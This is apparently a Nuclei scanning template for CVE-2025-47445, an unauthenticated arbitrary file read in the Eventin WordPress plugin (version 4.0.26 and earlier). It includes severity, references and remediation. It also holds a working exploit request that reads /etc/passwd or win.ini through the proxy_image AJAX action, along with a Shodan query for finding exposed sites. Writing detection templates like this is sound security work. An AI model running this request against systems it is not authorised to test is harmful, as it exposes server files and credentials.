Vulnerability description
Themewinter Eventin contains a path traversal caused by relative path manipulation, letting attackers read arbitrary files on the server. Exploitation requires no specific privileges or user interaction.
id: CVE-2025-47445

info:
  name: WordPress Eventin (Themewinter) ≤ 4.0.26 - Arbitrary File Download
  author: hnd3884
  severity: high
  description: |
    Themewinter Eventin contains a path traversal caused by relative path manipulation, letting attackers read arbitrary files on the server. Exploitation requires no specific privileges or user interaction.
  impact: |
    Attackers can access sensitive files on the server, potentially leading to information disclosure or system compromise.
  remediation: |
    Update to the latest version of Eventin, version 4.0.27 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/wp-event-solution/vulnerability/wordpress-eventin-4-0-26-arbitrary-file-download-vulnerability?_s_id=cve
    - https://github.com/advisories/GHSA-c3pr-284f-8x9f
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-47445
    cwe-id: CWE-23
    epss-score: 0.05925
    epss-percentile: 0.90267
    cpe: cpe:2.3:a:themewinter:eventin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themewinter
    shodan-query: html:"wp-event-solution"
  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,lfi,wp-event-solution,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=proxy_image&url={{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 400
# digest: 490a00463044022057a31e09d9e8d892e86d260f11a1907d4943c16ae52ddc0341ebd29a289749210220600d4beb8ae1cc5b6ce656b24cefb35d43c6810fd96ed12280aa6b870e187836:922c64590222798bb761d5b6d8e72950